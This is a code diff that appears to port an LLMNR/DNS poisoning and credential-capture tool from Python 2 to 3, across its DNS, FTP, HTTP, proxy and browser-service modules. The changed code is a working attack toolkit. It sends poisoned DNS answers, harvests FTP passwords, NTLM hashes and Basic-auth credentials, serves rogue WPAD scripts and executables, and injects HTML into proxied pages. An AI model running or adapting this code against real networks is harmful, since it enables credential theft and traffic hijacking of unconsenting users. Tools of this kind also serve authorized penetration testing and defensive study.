-		"\x0c": 'Domain/Workgroup Announcement',
-		"\x0d": 'Master Announcement',
-		"\x0e": 'Reset Browser State Announcement',
-		"\x0f": 'Local Master Announcement',
+		b"\x01": 'Host Announcement',
+		b"\x02": 'Request Announcement',
+		b"\x08": 'Browser Election',
+		b"\x09": 'Get Backup List Request',
+		b"\x0a": 'Get Backup List Response',
+		b"\x0b": 'Become Backup Browser',
+		b"\x0c": 'Domain/Workgroup Announcement',
+		b"\x0d": 'Master Announcement',
+		b"\x0e": 'Reset Browser State Announcement',
+		b"\x0f": 'Local Master Announcement',
 	}.get(data, 'Unknown')
 
 
@@ -55,13 +58,13 @@ def PrintServerName(data, entries):
 	if entries <= 0:
 		return None
 	entrieslen = 26 * entries
-	chunks, chunk_size = len(data[:entrieslen]), entrieslen/entries
+	chunks, chunk_size = len(data[:entrieslen]), entrieslen//entries
 	ServerName = [data[i:i+chunk_size] for i in range(0, chunks, chunk_size)]
 
 	l = []
 	for x in ServerName:
 		fingerprint = WorkstationFingerPrint(x[16:18])
-		name = x[:16].replace('\x00', '')
+		name = x[:16].strip(b'\x00').decode('latin-1')
 		l.append('%s (%s)' % (name, fingerprint))
 	return l
 
@@ -70,24 +73,24 @@ def ParsePacket(Payload):
 	PayloadOffset = struct.unpack('<H',Payload[51:53])[0]
 	StatusCode = Payload[PayloadOffset-4:PayloadOffset-2]
 
-	if StatusCode == "\x00\x00":
+	if StatusCode == b'\x00\x00':
 		EntriesNum = struct.unpack('<H',Payload[PayloadOffset:PayloadOffset+2])[0]
 		return PrintServerName(Payload[PayloadOffset+4:], EntriesNum)
-	return None
+	return ''
 
 
 def RAPThisDomain(Client,Domain):		
 	PDC = RapFinger(Client,Domain,"\x00\x00\x00\x80")
 	if PDC is not None:
-		print text("[LANMAN] Detected Domains: %s" % ', '.join(PDC))
+		print(text("[LANMAN] Detected Domains: %s" % ', '.join(PDC)))
 	
 	SQL = RapFinger(Client,Domain,"\x04\x00\x00\x00")
 	if SQL is not None:
-		print text("[LANMAN] Detected SQL Servers on domain %s: %s" % (Domain, ', '.join(SQL)))
+		print(text("[LANMAN] Detected SQL Servers on domain %s: %s" % (Domain, ', '.join(SQL))))
 
 	WKST = RapFinger(Client,Domain,"\xff\xff\xff\xff")
 	if WKST is not None:
-		print text("[LANMAN] Detected Workstations/Servers on domain %s: %s" % (Domain, ', '.join(WKST)))
+		print(text("[LANMAN] Detected Workstations/Servers on domain %s: %s" % (Domain, ', '.join(WKST))))
 
 
 def RapFinger(Host, Domain, Type):
@@ -101,49 +104,49 @@ def RapFinger(Host, Domain, Type):
 		Body.calculate()
 
 		Packet = str(Header)+str(Body)
-		Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
+		Buffer = StructPython2or3('>i', str(Packet))+str(Packet)#struct.pack(">i", len(''.join(Packet))) + Packet
 
-		s.send(Buffer)
+		s.send(NetworkSendBufferPython2or3(Buffer))
 		data = s.recv(1024)
 
 		# Session Setup AndX Request, Anonymous.
-		if data[8:10] == "\x72\x00":
+		if data[8:10] == b'\x72\x00':
 			Header = SMBHeader(cmd="\x73",mid="\x02\x00")
 			Body = SMBSessionData()
 			Body.calculate()
 
 			Packet = str(Header)+str(Body)
-			Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
+			Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
 
-			s.send(Buffer)
+			s.send(NetworkSendBufferPython2or3(Buffer))
 			data = s.recv(1024)
 
 			# Tree Connect IPC$.
-			if data[8:10] == "\x73\x00":
-				Header = SMBHeader(cmd="\x75",flag1="\x08", flag2="\x01\x00",uid=data[32:34],mid="\x03\x00")
+			if data[8:10] == b'\x73\x00':
+				Header = SMBHeader(cmd="\x75",flag1="\x08", flag2="\x01\x00",uid=data[32:34].decode('latin-1'),mid="\x03\x00")
 				Body = SMBTreeConnectData(Path="\\\\"+Host+"\\IPC$")
 				Body.calculate()
 
 				Packet = str(Header)+str(Body)
-				Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
+				Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
 
-				s.send(Buffer)
+				s.send(NetworkSendBufferPython2or3(Buffer))
 				data = s.recv(1024)
 
 				# Rap ServerEnum.
-				if data[8:10] == "\x75\x00":
-					Header = SMBHeader(cmd="\x25",flag1="\x08", flag2="\x01\xc8",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x04\x00")
+				if data[8:10] == b'\x75\x00':
+					Header = SMBHeader(cmd="\x25",flag1="\x08", flag2="\x01\xc8",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x04\x00")
 					Body = SMBTransRAPData(Data=RAPNetServerEnum3Data(ServerType=Type,DetailLevel="\x01\x00",TargetDomain=Domain))
 					Body.calculate()
 
 					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
+					Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
 
-					s.send(Buffer)
+					s.send(NetworkSendBufferPython2or3(Buffer))
 					data = s.recv(64736)
 
 					# Rap ServerEnum, Get answer and return what we're looking for.
-					if data[8:10] == "\x25\x00":
+					if data[8:10] == b'\x25\x00':
 						s.close()
 						return ParsePacket(data)
 	except:
@@ -162,8 +165,10 @@ def BecomeBackup(data,Client):
 			Role       = NBT_NS_Role(data[45:48])
 
 			if settings.Config.AnalyzeMode:
-				print text("[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client, Name,Role,Domain))
-				print RAPThisDomain(Client, Domain)
+				print(text("[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client, Name,Role,Domain)))
+				RAPInfo = RAPThisDomain(Client, Domain)
+				if RAPInfo is not None:
+					print(RAPInfo)
 
 	except:
 		pass
@@ -177,8 +182,10 @@ def ParseDatagramNBTNames(data,Client):
 
 	
 		if Role2 == "Domain Controller" or Role2 == "Browser Election" or Role2 == "Local Master Browser" and settings.Config.AnalyzeMode:
-			print text('[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s' % (Client, Name, Role1, Domain, Role2))
-			print RAPThisDomain(Client, Domain)
+			print(text('[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s' % (Client, Name, Role1, Domain, Role2)))
+			RAPInfo = RAPThisDomain(Client, Domain)
+			if RAPInfo is not None:
+				print(RAPInfo)
 	except:
 		pass
 
@@ -189,7 +196,7 @@ class Browser(BaseRequestHandler):
 			request, socket = self.request
 
 			if settings.Config.AnalyzeMode:
-				ParseDatagramNBTNames(request,self.client_address[0])
+				ParseDatagramNBTNames(NetworkRecvBufferPython2or3(request),self.client_address[0])
 				BecomeBackup(request,self.client_address[0])
 			BecomeBackup(request,self.client_address[0])
 

servers/DNS.py

@@ -14,34 +14,44 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from packets import DNS_Ans
-from SocketServer import BaseRequestHandler
 from utils import *
+from packets import DNS_Ans, DNS_SRV_Ans
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
 
 def ParseDNSType(data):
 	QueryTypeClass = data[len(data)-4:]
-
 	# If Type A, Class IN, then answer.
-	return QueryTypeClass == "\x00\x01\x00\x01"
+	if QueryTypeClass == "\x00\x01\x00\x01":
+		return "A"
+	if QueryTypeClass == "\x00\x21\x00\x01":
+		return "SRV"
 
 
 
 class DNS(BaseRequestHandler):
 	def handle(self):
-		# Break out if we don't want to respond to this host
+		# Ditch it if we don't want to respond to this host
 		if RespondToThisIP(self.client_address[0]) is not True:
 			return None
 
 		try:
 			data, soc = self.request
-
-			if ParseDNSType(data) and settings.Config.AnalyzeMode == False:
+			if ParseDNSType(NetworkRecvBufferPython2or3(data)) is "A" and settings.Config.AnalyzeMode == False:
 				buff = DNS_Ans()
-				buff.calculate(data)
-				soc.sendto(str(buff), self.client_address)
+				buff.calculate(NetworkRecvBufferPython2or3(data))
+				soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
+				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
+				print(color("[*] [DNS] A Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))
 
-				ResolveName = re.sub(r'[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
-				print color("[*] [DNS] Poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1)
+			if ParseDNSType(NetworkRecvBufferPython2or3(data)) is "SRV" and settings.Config.AnalyzeMode == False:
+				buff = DNS_SRV_Ans()
+				buff.calculate(NetworkRecvBufferPython2or3(data))
+				soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
+				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
+				print(color("[*] [DNS] SRV Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))
 
 		except Exception:
 			pass
@@ -55,14 +65,19 @@ class DNSTCP(BaseRequestHandler):
 	
 		try:
 			data = self.request.recv(1024)
-
-			if ParseDNSType(data) and settings.Config.AnalyzeMode is False:
+			if ParseDNSType(NetworkRecvBufferPython2or3(data)) is "A" and settings.Config.AnalyzeMode is False:
 				buff = DNS_Ans()
-				buff.calculate(data)
-				self.request.send(str(buff))
-
+				buff.calculate(NetworkRecvBufferPython2or3(data))
+				self.request.send(NetworkSendBufferPython2or3(buff))
 				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
-				print color("[*] [DNS-TCP] Poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1)
+				print(color("[*] [DNS] A Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))
+
+			if ParseDNSType(NetworkRecvBufferPython2or3(data)) is "SRV" and settings.Config.AnalyzeMode == False:
+				buff = DNS_SRV_Ans()
+				buff.calculate(NetworkRecvBufferPython2or3(data))
+				self.request.send(NetworkSendBufferPython2or3(buff))
+				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
+				print(color("[*] [DNS] SRV Record poisoned answer sent: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))
 
 		except Exception:
 			pass

servers/FTP.py

@@ -15,27 +15,31 @@
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 from utils import *
-from SocketServer import BaseRequestHandler
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
 from packets import FTPPacket
 
 class FTP(BaseRequestHandler):
 	def handle(self):
 		try:
-			self.request.send(str(FTPPacket()))
+			self.request.send(NetworkSendBufferPython2or3(FTPPacket()))
 			data = self.request.recv(1024)
 
-			if data[0:4] == "USER":
-				User = data[5:].strip()
+			if data[0:4] == b'USER':
+				User = data[5:].strip().decode("latin-1")
 
 				Packet = FTPPacket(Code="331",Message="User name okay, need password.")
-				self.request.send(str(Packet))
+				self.request.send(NetworkSendBufferPython2or3(Packet))
 				data = self.request.recv(1024)
 
-			if data[0:4] == "PASS":
-				Pass = data[5:].strip()
+			if data[0:4] == b'PASS':
+				Pass = data[5:].strip().decode("latin-1")
 
 				Packet = FTPPacket(Code="530",Message="User not logged in.")
-				self.request.send(str(Packet))
+				self.request.send(NetworkSendBufferPython2or3(Packet))
 				data = self.request.recv(1024)
 
 				SaveToDb({
@@ -49,7 +53,7 @@ class FTP(BaseRequestHandler):
 
 			else:
 				Packet = FTPPacket(Code="502",Message="Command not implemented.")
-				self.request.send(str(Packet))
+				self.request.send(NetworkSendBufferPython2or3(Packet))
 				data = self.request.recv(1024)
 
 		except Exception:

servers/HTTP.py

@@ -14,43 +14,46 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from SocketServer import BaseRequestHandler, StreamRequestHandler
-from base64 import b64decode
 import struct
+import codecs
 from utils import *
-
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler, StreamRequestHandler
+else:
+	from SocketServer import BaseRequestHandler, StreamRequestHandler
+from base64 import b64decode, b64encode
 from packets import NTLM_Challenge
-from packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans
+from packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans,WEBDAV_Options_Answer
 from packets import WPADScript, ServeExeFile, ServeHtmlFile
 
 
 # Parse NTLMv1/v2 hash.
-def ParseHTTPHash(data, client):
+def ParseHTTPHash(data, Challenge, client, module):
 	LMhashLen    = struct.unpack('<H',data[12:14])[0]
 	LMhashOffset = struct.unpack('<H',data[16:18])[0]
-	LMHash       = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
+	LMHash       = data[LMhashOffset:LMhashOffset+LMhashLen]
+	LMHashFinal  = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
 	
 	NthashLen    = struct.unpack('<H',data[20:22])[0]
 	NthashOffset = struct.unpack('<H',data[24:26])[0]
-	NTHash       = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
-	
+	NTHash       = data[NthashOffset:NthashOffset+NthashLen]
+	NTHashFinal  = codecs.encode(NTHash, 'hex').upper().decode('latin-1')
 	UserLen      = struct.unpack('<H',data[36:38])[0]
 	UserOffset   = struct.unpack('<H',data[40:42])[0]
-	User         = data[UserOffset:UserOffset+UserLen].replace('\x00','')
-
+	User         = data[UserOffset:UserOffset+UserLen].decode('latin-1').replace('\x00','')
+	Challenge1    = codecs.encode(Challenge,'hex').decode('latin-1')
 	if NthashLen == 24:
 		HostNameLen     = struct.unpack('<H',data[46:48])[0]
 		HostNameOffset  = struct.unpack('<H',data[48:50])[0]
-		HostName        = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
-		WriteHash       = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, settings.Config.NumChal)
-
+		HostName        = data[HostNameOffset:HostNameOffset+HostNameLen].decode('latin-1').replace('\x00','')
+		WriteHash       = '%s::%s:%s:%s:%s' % (User, HostName, LMHashFinal, NTHashFinal, Challenge1)
 		SaveToDb({
-			'module': 'HTTP', 
+			'module': module, 
 			'type': 'NTLMv1', 
 			'client': client, 
 			'host': HostName, 
 			'user': User, 
-			'hash': LMHash+":"+NTHash, 
+			'hash': LMHashFinal+':'+NTHashFinal, 
 			'fullhash': WriteHash,
 		})
 
@@ -58,19 +61,18 @@ def ParseHTTPHash(data, client):
 		NthashLen      = 64
 		DomainLen      = struct.unpack('<H',data[28:30])[0]
 		DomainOffset   = struct.unpack('<H',data[32:34])[0]
-		Domain         = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
+		Domain         = data[DomainOffset:DomainOffset+DomainLen].decode('latin-1').replace('\x00','')
 		HostNameLen    = struct.unpack('<H',data[44:46])[0]
 		HostNameOffset = struct.unpack('<H',data[48:50])[0]
-		HostName       = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
-		WriteHash      = '%s::%s:%s:%s:%s' % (User, Domain, settings.Config.NumChal, NTHash[:32], NTHash[32:])
-
+		HostName       = data[HostNameOffset:HostNameOffset+HostNameLen].decode('latin-1').replace('\x00','')
+		WriteHash      = '%s::%s:%s:%s:%s' % (User, Domain, Challenge1, NTHashFinal[:32], NTHashFinal[32:])
 		SaveToDb({
-			'module': 'HTTP', 
+			'module': module, 
 			'type': 'NTLMv2', 
 			'client': client, 
 			'host': HostName, 
 			'user': Domain + '\\' + User,
-			'hash': NTHash[:32] + ":" + NTHash[32:],
+			'hash': NTHashFinal[:32] + ':' + NTHashFinal[32:],
 			'fullhash': WriteHash,
 		})
 
@@ -80,7 +82,7 @@ def GrabCookie(data, host):
 	if Cookie:
 		Cookie = Cookie.group(0).replace('Cookie: ', '')
 		if len(Cookie) > 1 and settings.Config.Verbose:
-			print text("[HTTP] Cookie           : %s " % Cookie)
+			print(text("[HTTP] Cookie           : %s " % Cookie))
 		return Cookie
 	return False
 
@@ -90,7 +92,7 @@ def GrabHost(data, host):
 	if Host:
 		Host = Host.group(0).replace('Host: ', '')
 		if settings.Config.Verbose:
-			print text("[HTTP] Host             : %s " % color(Host, 3))
+			print(text("[HTTP] Host             : %s " % color(Host, 3)))
 		return Host
 	return False
 
@@ -100,32 +102,62 @@ def GrabReferer(data, host):
 	if Referer:
 		Referer = Referer.group(0).replace('Referer: ', '')
 		if settings.Config.Verbose:
-			print text("[HTTP] Referer         : %s " % color(Referer, 3))
+			print(text("[HTTP] Referer         : %s " % color(Referer, 3)))
 		return Referer
 	return False
 
+def SpotFirefox(data):
+	UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
+	if UserAgent:
+		print(text("[HTTP] %s" % color("User-Agent        : "+UserAgent[0], 2)))
+		IsFirefox = re.search('Firefox', UserAgent[0])
+		if IsFirefox:
+			print(color("[WARNING]: Mozilla doesn't switch to fail-over proxies (as it should) when one's failing.", 1))
+			print(color("[WARNING]: The current WPAD script will cause disruption on this host. Sending a dummy wpad script (DIRECT connect)", 1))
+			return True
+		else:
+			return False
+
 def WpadCustom(data, client):
 	Wpad = re.search(r'(/wpad.dat|/*\.pac)', data)
-	if Wpad:
+	if Wpad and SpotFirefox(data):
+		Buffer = WPADScript(Payload="function FindProxyForURL(url, host){return 'DIRECT';}")
+		Buffer.calculate()
+		return str(Buffer)
+
+	if Wpad and SpotFirefox(data) == False:
 		Buffer = WPADScript(Payload=settings.Config.WPAD_Script)
 		Buffer.calculate()
 		return str(Buffer)
 	return False
 
+def IsWebDAV(data):
+        dav = re.search('PROPFIND', data)
+        if dav:
+              return True
+        else:
+              return False
+
+def ServeOPTIONS(data):
+	WebDav= re.search('OPTIONS', data)
+	if WebDav:
+		Buffer = WEBDAV_Options_Answer()
+		return str(Buffer)
+
+	return False
+
 def ServeFile(Filename):
 	with open (Filename, "rb") as bk:
-		return bk.read()
+		return NetworkRecvBufferPython2or3(bk.read())
 
 def RespondWithFile(client, filename, dlname=None):
-	
 	if filename.endswith('.exe'):
 		Buffer = ServeExeFile(Payload = ServeFile(filename), ContentDiFile=dlname)
 	else:
 		Buffer = ServeHtmlFile(Payload = ServeFile(filename))
 
 	Buffer.calculate()
-	print text("[HTTP] Sending file %s to %s" % (filename, client))
-
+	print(text("[HTTP] Sending file %s to %s" % (filename, client)))
 	return str(Buffer)
 
 def GrabURL(data, host):
@@ -134,15 +166,16 @@ def GrabURL(data, host):
 	POSTDATA = re.findall(r'(?<=\r\n\r\n)[^*]*', data)
 
 	if GET and settings.Config.Verbose:
-		print text("[HTTP] GET request from: %-15s  URL: %s" % (host, color(''.join(GET), 5)))
+		print(text("[HTTP] GET request from: %-15s  URL: %s" % (host, color(''.join(GET), 5))))
 
 	if POST and settings.Config.Verbose:
-		print text("[HTTP] POST request from: %-15s  URL: %s" % (host, color(''.join(POST), 5)))
+		print(text("[HTTP] POST request from: %-15s  URL: %s" % (host, color(''.join(POST), 5))))
+
 		if len(''.join(POSTDATA)) > 2:
-			print text("[HTTP] POST Data: %s" % ''.join(POSTDATA).strip())
+			print(text("[HTTP] POST Data: %s" % ''.join(POSTDATA).strip()))
 
 # Handle HTTP packet sequence.
-def PacketSequence(data, client):
+def PacketSequence(data, client, Challenge):
 	NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
 	Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)
 
@@ -155,35 +188,41 @@ def PacketSequence(data, client):
 		return RespondWithFile(client, settings.Config.Html_Filename)
 
 	WPAD_Custom = WpadCustom(data, client)
-	
+        # Webdav
+	if ServeOPTIONS(data):
+		return ServeOPTIONS(data)
+
 	if NTLM_Auth:
 		Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
-
-		if Packet_NTLM == "\x01":
+		if Packet_NTLM == b'\x01':
 			GrabURL(data, client)
 			GrabReferer(data, client)
 			GrabHost(data, client)
 			GrabCookie(data, client)
 
-			Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
+			Buffer = NTLM_Challenge(ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
 			Buffer.calculate()
 
-			Buffer_Ans = IIS_NTLM_Challenge_Ans()
-			Buffer_Ans.calculate(str(Buffer))
+			Buffer_Ans = IIS_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
+			#Buffer_Ans.calculate(Buffer)
+			return Buffer_Ans
 
-			return str(Buffer_Ans)
-
-		if Packet_NTLM == "\x03":
+		if Packet_NTLM == b'\x03':
 			NTLM_Auth = b64decode(''.join(NTLM_Auth))
-			ParseHTTPHash(NTLM_Auth, client)
+			if IsWebDAV(data):
+                                 module = "WebDAV"
+			else:
+                                 module = "HTTP"
+			ParseHTTPHash(NTLM_Auth, Challenge, client, module)
 
 			if settings.Config.Force_WPAD_Auth and WPAD_Custom:
-				print text("[HTTP] WPAD (auth) file sent to %s" % client)
+				print(text("[HTTP] WPAD (auth) file sent to %s" % client))
+
 				return WPAD_Custom
 			else:
 				Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
 				Buffer.calculate()
-				return str(Buffer)
+				return Buffer
 
 	elif Basic_Auth:
 		ClearText_Auth = b64decode(''.join(Basic_Auth))
@@ -197,71 +236,78 @@ def PacketSequence(data, client):
 			'module': 'HTTP', 
 			'type': 'Basic', 
 			'client': client, 
-			'user': ClearText_Auth.split(':')[0], 
-			'cleartext': ClearText_Auth.split(':')[1], 
-		})
+			'user': ClearText_Auth.decode('latin-1').split(':')[0], 
+			'cleartext': ClearText_Auth.decode('latin-1').split(':')[1], 
+			})
 
 		if settings.Config.Force_WPAD_Auth and WPAD_Custom:
 			if settings.Config.Verbose:
-				print text("[HTTP] WPAD (auth) file sent to %s" % client)
+				print(text("[HTTP] WPAD (auth) file sent to %s" % client))
+
 			return WPAD_Custom
 		else:
 			Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
 			Buffer.calculate()
-			return str(Buffer)
+			return Buffer
 	else:
 		if settings.Config.Basic:
 			Response = IIS_Basic_401_Ans()
 			if settings.Config.Verbose:
-				print text("[HTTP] Sending BASIC authentication request to %s" % client)
+				print(text("[HTTP] Sending BASIC authentication request to %s" % client))
+
 		else:
 			Response = IIS_Auth_401_Ans()
 			if settings.Config.Verbose:
-				print text("[HTTP] Sending NTLM authentication request to %s" % client)
-		return str(Response)
+				print(text("[HTTP] Sending NTLM authentication request to %s" % client))
+
+		return Response
 
 # HTTP Server class
 class HTTP(BaseRequestHandler):
+
 	def handle(self):
 		try:
+			Challenge = RandomChallenge()
 			while True:
-				self.request.settimeout(1)
-				data = self.request.recv(8092)
+				self.request.settimeout(3)
+				remaining = 10*1024*1024 #setting max recieve size
+				data = ''
+				while True:
+					buff = ''
+					buff = NetworkRecvBufferPython2or3(self.request.recv(8092))
+					if buff == '':
+						break
+					data += buff
+					remaining -= len(buff)
+					#check if we recieved the full header
+					if data.find('\r\n\r\n') != -1: 
+						#we did, now to check if there was anything else in the request besides the header
+						if data.find('Content-Length') == -1:
+							#request contains only header
+							break
+						else:
+							#searching for that content-length field in the header
+							for line in data.split('\r\n'):
+								if line.find('Content-Length') != -1:
+									line = line.strip()
+									remaining = int(line.split(':')[1].strip()) - len(data)
+					if remaining <= 0:
+						break
+				if data == "":
+					break
+				#now the data variable has the full request
 				Buffer = WpadCustom(data, self.client_address[0])
 
 				if Buffer and settings.Config.Force_WPAD_Auth == False:
-					self.request.send(Buffer)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
+					self.request.close()
 					if settings.Config.Verbose:
-						print text("[HTTP] WPAD (no auth) file sent to %s" % self.client_address[0])
+						print(text("[HTTP] WPAD (no auth) file sent to %s" % self.client_address[0]))
 
 				else:
-					Buffer = PacketSequence(data,self.client_address[0])
-					self.request.send(Buffer)
-		except socket.error:
-			pass
-
-# HTTPS Server class
-class HTTPS(StreamRequestHandler):
-	def setup(self):
-		self.exchange = self.request
-		self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
-		self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
-
-	def handle(self):
-		try:
-			while True:
-				data = self.exchange.recv(8092)
-				self.exchange.settimeout(0.5)
-				Buffer = WpadCustom(data,self.client_address[0])
-				
-				if Buffer and settings.Config.Force_WPAD_Auth == False:
-					self.exchange.send(Buffer)
-					if settings.Config.Verbose:
-						print text("[HTTPS] WPAD (no auth) file sent to %s" % self.client_address[0])
-
-				else:
-					Buffer = PacketSequence(data,self.client_address[0])
-					self.exchange.send(Buffer)
+					Buffer = PacketSequence(data,self.client_address[0], Challenge)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
+		
 		except:
 			pass
-
+			

servers/HTTP_Proxy.py

@@ -14,13 +14,18 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import urlparse
+from utils import *
+if settings.Config.PY2OR3 == "PY3":
+	import urllib.parse as urlparse
+	import http.server as BaseHTTPServer
+else:
+	import urlparse
+	import BaseHTTPServer
+
 import select
 import zlib
-import BaseHTTPServer
-
 from servers.HTTP import RespondWithFile
-from utils import *
+
 
 IgnoredDomains = [ 'crl.comodoca.com', 'crl.usertrust.com', 'ocsp.comodoca.com', 'ocsp.usertrust.com', 'www.download.windowsupdate.com', 'crl.microsoft.com' ]
 
@@ -34,9 +39,9 @@ def InjectData(data, client, req_uri):
 	if settings.Config.Serve_Exe == True and req_uri.endswith('.exe'):
 		return RespondWithFile(client, settings.Config.Exe_Filename, os.path.basename(req_uri))
 
-	if len(data.split('\r\n\r\n')) > 1:
+	if len(data.split(b'\r\n\r\n')) > 1:
 		try:
-			Headers, Content = data.split('\r\n\r\n')
+			Headers, Content = data.split(b'\r\n\r\n')
 		except:
 			return data
 
@@ -44,30 +49,34 @@ def InjectData(data, client, req_uri):
 		if set(RedirectCodes) & set(Headers):
 			return data
 
-		if "content-encoding: gzip" in Headers.lower():
+		Len = b''.join(re.findall(b'(?<=Content-Length: )[^\r\n]*', Headers))
+
+		if b'content-encoding: gzip' in Headers.lower():
 			Content = zlib.decompress(Content, 16+zlib.MAX_WBITS)
 
-		if "content-type: text/html" in Headers.lower():
+		if b'content-type: text/html' in Headers.lower():
 			if settings.Config.Serve_Html:  # Serve the custom HTML if needed
 				return RespondWithFile(client, settings.Config.Html_Filename)
 
-			Len = ''.join(re.findall(r'(?<=Content-Length: )[^\r\n]*', Headers))
-			HasBody = re.findall(r'(<body[^>]*>)', Content)
 
-			if HasBody and len(settings.Config.HtmlToInject) > 2:
+			HasBody = re.findall(b'(<body[^>]*>)', Content, re.IGNORECASE)
+
+			if HasBody and len(settings.Config.HtmlToInject) > 2 and not req_uri.endswith('.js'):
 				if settings.Config.Verbose:
-					print text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HtmlToInject, 3, 1))
+					print(text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HtmlToInject, 3, 1)))
 
-				Content = Content.replace(HasBody[0], '%s\n%s' % (HasBody[0], settings.Config.HtmlToInject))
+				Content = Content.replace(HasBody[0], b'%s\n%s' % (HasBody[0], settings.Config.HtmlToInject.encode('latin-1')))
 
-		if "content-encoding: gzip" in Headers.lower():
+		if b'content-encoding: gzip' in Headers.lower():
 			Content = zlib.compress(Content)
 
-		Headers = Headers.replace("Content-Length: "+Len, "Content-Length: "+ str(len(Content)))
-		data = Headers +'\r\n\r\n'+ Content
+		Headers = Headers.replace(b'Content-Length: '+Len, b'Content-Length: '+ NetworkSendBufferPython2or3(len(Content)))
+		data = Headers +b'\r\n\r\n'+ Content
+
 	else:
 		if settings.Config.Verbose:
-			print text("[PROXY] Returning unmodified HTTP response")
+			print(text("[PROXY] Returning unmodified HTTP response"))
+
 	return data
 
 class ProxySock:
@@ -99,14 +108,14 @@ class ProxySock:
 				# Replace the socket by a connection to the proxy
 				self.socket = socket.socket(family, socktype, proto)
 				self.socket.connect(sockaddr)
-			except socket.error, msg:
+			except socket.error as msg:
 				if self.socket:
 					self.socket.close()
 				self.socket = None
 				continue
 			break
 		if not self.socket :
-			raise socket.error, msg
+			raise socket.error(msg)
 		
 		# Ask him to create a tunnel connection to the target host/port
 		self.socket.send(
@@ -121,7 +130,7 @@ class ProxySock:
 		
 		# Not 200 ?
 		if parts[1] != "200":
-			print color("[!] Error response from upstream proxy: %s" % resp, 1)
+			print(color("[!] Error response from upstream proxy: %s" % resp, 1))
 			pass
 
 	# Wrap all methods of inner socket, without any change
@@ -200,7 +209,7 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 	def handle(self):
 		(ip, port) =  self.client_address
 		if settings.Config.Verbose:
-			print text("[PROXY] Received connection from %s" % self.client_address[0])
+			print(text("[PROXY] Received connection from %s" % self.client_address[0]))
 		self.__base_handle()
 
 	def _connect_to(self, netloc, soc):
@@ -210,7 +219,7 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 		else:
 			host_port = netloc, 80
 		try: soc.connect(host_port)
-		except socket.error, arg:
+		except socket.error as arg:
 			try: msg = arg[1]
 			except: msg = arg
 			self.send_error(404, msg)
@@ -271,14 +280,14 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
